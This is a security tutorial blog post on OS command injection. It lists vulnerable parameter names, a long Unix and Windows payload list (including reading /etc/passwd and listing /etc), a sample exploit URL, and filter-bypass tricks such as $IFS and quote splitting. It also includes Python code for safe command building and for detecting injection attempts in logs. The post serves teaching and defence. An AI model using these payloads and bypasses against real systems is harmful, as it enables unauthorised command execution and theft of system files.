AlbusSec:- Penetration-List 07 Command Injection — Sample

Albus Security
4 min read · May 23, 2022


Hi Information Security folks, I hope you liked the SQL Injection sample series, where you learned about SQL injection in depth. In today’s article we’ll start learning about Command Injection, also known as Remote Command Execution (not Remote Code Execution). Firstly, I’ll introduce myself: I’m Aniket Tyagi, an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher, and the founder of Albus Security. Without wasting our energy, let’s get started.

Command Injection

Command Injection is an attack in which the attacker executes arbitrary system commands on the target operating system via a vulnerable application. Basically, an attacker injects operating-system commands through vulnerable parameters; running OS commands remotely on the server that hosts the vulnerable application is therefore called Remote Command Execution. A lot of beginners think that RCE and command injection are the same, but they are not, because there is a difference. In Remote Code Execution, an attacker injects their own code into the server via the vulnerable application, rather than injecting OS commands into the server. With command injection, an attacker can also use the vulnerable server as a medium for attacks against other systems; the most common example is a DoS attack.

  • Possible Parameter For Command Injection
  • Command Payload
  • Exploitation
  • Bypass Technique

Possible Parameter For Command Injection:-

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Common Payload:-

--> For UNIX
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
--> For Windows
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www

For More Payloads, You can Visit Our Penetration-list Github Repo:- { Coming Soon }

Exploitation:-

Let’s take an example:- An application passes the value of the userID parameter directly into a system command in order to extract the user name from the server.

https://albussecurity.com/login.php?verify=1

The application sends a request to the server to look up a username by user ID. Since the application doesn’t sanitize the input, an attacker can inject an OS command.

https://albussecurity.com/login.php?verify= && ls

When an attacker tampers with the value of the verify parameter and submits a malicious value through that vulnerable parameter, the server lists all the usernames in its response because of the injected ls command. Likewise, you can execute any system command, such as pwd, whoami, nslookup, etc. There are also other metacharacters that enable command injection: ; , & , && , | , || , ` , #
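To make the userID lookup concrete, here is an added example (not code from the article or from Albus Security) that builds the lookup command three ways: the vulnerable string concatenation, a `shlex.quote()` variant for when a shell string cannot be avoided, and the preferred allow-list plus argv-without-shell variant. The function names, the allow-list pattern and the use of `id -un` as the lookup command are assumptions for illustration.

```python
import re
import shlex
import subprocess

# Allow-list for the verify parameter (assumption: a user id is a short
# alphanumeric token; adjust to match the real application).
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_safe_id(verify: str) -> bool:
    """Allow-list check: accept only values that can be nothing but a user id."""
    return SAFE_ID.fullmatch(verify) is not None


def build_vulnerable_command(verify: str) -> str:
    """The anti-pattern from the article: untrusted text spliced into a string
    that /bin/sh will parse. With verify = "1 && ls" the shell sees two commands."""
    return "id -un " + verify


def build_quoted_command(verify: str) -> str:
    """Mitigation 1: when a shell string cannot be avoided, shlex.quote() turns
    the whole value into one literal argument, so ; & | ` $ lose their meaning."""
    return "id -un " + shlex.quote(verify)


def build_argv(verify: str) -> list[str]:
    """Mitigation 2 (preferred): allow-list the value, then build an argv list."""
    if not is_safe_id(verify):
        raise ValueError(f"rejected user id: {verify!r}")
    return ["id", "-un", verify]


def shell_words(command: str) -> list[str]:
    """Split a command string the way a POSIX shell would, to show what each
    variant actually hands to the operating system."""
    return shlex.split(command)


def lookup_user(verify: str) -> int:
    """Run the lookup without a shell: the list goes to execve(), never to
    /bin/sh, so a metacharacter that slipped past the allow-list is just bytes
    inside one argv element. Returns the exit status of `id`."""
    proc = subprocess.run(build_argv(verify), capture_output=True, text=True, check=False)
    return proc.returncode


if __name__ == "__main__":
    attack = "1 && ls"   # constructed sample of the article's payload
    print("vulnerable :", shell_words(build_vulnerable_command(attack)))
    print("quoted     :", shell_words(build_quoted_command(attack)))
    try:
        build_argv(attack)
    except ValueError as err:
        print("allow-list :", err)
    print("exit status:", lookup_user("root"))
```

The allow-list is the control that matters: quoting alone still lets arbitrary text reach the command as an argument, which is fine for `id` but not for a binary with dangerous options.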

Bypass-Technique:-

Using Wildcard(*):-

We’ll use a wildcard (*) in the OS command:

pi*ng albussecurity.com

Using Square Bracket:-

You can also use square brackets in the payload:

p[i]n[g] albussecurity.com

Concatenation Technique:-

We’ll use single quotes, double quotes, backslashes and forward slashes, and you can also combine them.

Single-Quotes:-

'p'i'n'g albussecurity.com

pi''ng albussecurity.com

Double-Quotes:-

"p"i"n"g albussecurity.com

p""ing albussecurity.com

Backslash and Forward Slash:-

\p\i\n\g albussecurity.com

/\p/i//\\n\/g albussecurity.com

Using Uninitialized Variables technique:-

An uninitialized variable is treated as null (nothing), so we’ll use this technique to bypass filters:

ping$u albussecurity.com

ping${u} albussecurity.com

ping$(u) albussecurity.com

p$(u)i$(u)n$(u)g albussecurity.com

p'u'i'u'n'u'g albussecurity.com

You can combine these patterns to form a new bypass payload.

Inject Payload inside {command}:-

Here we’ll put the payload inside braces:

{ping,127.0.0.1}

Use an Internal field separator mechanism:-

You can use $IFS instead of spaces:

ping${IFS}127.0.0.1

ping$IFS127.0.0.1
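The bypass patterns above are exactly what defeats a naive blocklist on the literal word `ping`. As an added example (not part of the article), the following Python normalises a request parameter the way a POSIX shell would interpret it (quotes, backslashes, `$IFS`, unset variables, `$(...)`, braces) and then matches each remaining word against a list of commands with `fnmatch`, which resolves `pi*ng` and `p[i]n[g]` the way shell globbing would. The log lines, the command list and the parameter names are constructed; a raw `&` in a query string is itself a parameter separator and would normally arrive percent-encoded (`%26`), so the scanner works on decoded values.

```python
import fnmatch
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Commands of interest, taken from the payload list above; extend per environment.
COMMANDS = ("id", "ls", "cat", "ping", "whoami", "pwd", "sleep",
            "ifconfig", "ipconfig", "nslookup")

SEPARATORS = re.compile(r"\|\||&&|[;&|\n]")           # command separators from the article
OBFUSCATION = re.compile(r"""['"\\$*\[{]""")          # quoting / expansion / glob characters
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def matching_commands(word: str) -> set:
    """Commands a (possibly globbed) word resolves to: fnmatch treats pi*ng and
    p[i]n[g] as the shell would if a matching file existed; only the basename
    of a path such as /usr/bin/id is compared."""
    base = word.rsplit("/", 1)[-1]
    return {cmd for cmd in COMMANDS if fnmatch.fnmatchcase(cmd, base)}


def _substitution(match: re.Match) -> str:
    """`...` and $(...) run a separate command. A lone unknown word such as $(u)
    runs nothing and expands to an empty string (the uninitialised-variable trick)."""
    body = match.group(1).strip()
    if body and " " not in body and not SEPARATORS.search(body) and not matching_commands(body):
        return ""
    return " ; " + body + " "


def normalize(value: str) -> str:
    """Undo the quoting and expansion tricks so the remaining words can be compared."""
    s = unquote(value)                        # %0A, %20, %26; also catches double-encoding
    s = s.replace("\\", "")                   # \p\i\n\g -> ping
    # Detection choice: treat $IFS as a space even when digits follow it (bash
    # would read $IFS127 as a different variable); err toward flagging.
    s = re.sub(r"\$\{IFS\}|\$IFS", " ", s)
    s = re.sub(r"`([^`]*)`", _substitution, s)
    s = re.sub(r"\$\(([^)]*)\)", _substitution, s)
    s = re.sub(r"\$\{\w+\}|\$\w+", "", s)     # ${u}, $u: unset variable -> empty
    s = re.sub(r"['\"]", "", s)               # 'p'i'n'g, p""ing -> ping
    s = re.sub(r"\{([^{}]*)\}", lambda m: " " + m.group(1).replace(",", " ") + " ", s)
    s = re.sub(r"[()]", " ", s)               # a);id, system(cat ...)
    s = SEPARATORS.sub(" ; ", s)
    return " ".join(s.split())


def analyze(value: str) -> dict:
    """Report which commands a parameter value would reach, plus two indicators."""
    norm = normalize(value)
    decoded = unquote(value)
    words = [w for w in norm.split() if w != ";"]
    found = sorted(set().union(*(matching_commands(w) for w in words)) if words else [])
    return {"normalized": norm, "commands": found,
            "separator": SEPARATORS.search(decoded) is not None,
            "obfuscated": OBFUSCATION.search(decoded) is not None}


# Constructed access-log lines in common log format (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [23/May/2022:10:00:01 +0000] "GET /login.php?verify=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [23/May/2022:10:00:02 +0000] "GET /login.php?verify=1%20%26%26%20ls HTTP/1.1" 200 2048',
    '10.0.0.9 - - [23/May/2022:10:00:03 +0000] "GET /status.php?ping=127.0.0.1%3Bp%5Bi%5Dn%5Bg%5D%20albussecurity.com HTTP/1.1" 200 300',
    '10.0.0.9 - - [23/May/2022:10:00:04 +0000] "GET /status.php?ping=%7Bping,127.0.0.1%7D HTTP/1.1" 200 300',
    '10.0.0.7 - - [23/May/2022:10:00:05 +0000] "GET /search.php?query=albus%20security HTTP/1.1" 200 900',
]


def scan_log(lines) -> list:
    """Run analyze() over every query parameter of every request line; return hits."""
    hits = []
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            result = analyze(value)
            if result["commands"]:
                hits.append({"path": url.path, "param": param, **result})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["path"], hit["param"], hit["commands"], "->", hit["normalized"])
```

This is a coverage heuristic, not a shell parser: `$IFS` becomes a space regardless of what follows, an unknown single word inside `$(...)` is treated as empty, and a lone `*` token matches every command. Those choices all push toward flagging, which is the side a detection rule should sit on; the fix for the application itself is still an allow-list and argv without a shell.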

So finally we come to the end. I hope you liked the Command Injection article. It’s not a complete article, though; what’s here was kept brief. Very soon I’ll publish the “Penetration List”, in which you’ll get in-depth knowledge about vulnerabilities, because on Medium I upload topics only as samples, not as a proper section. Thank you for reading.

You can download a sample of the book:-
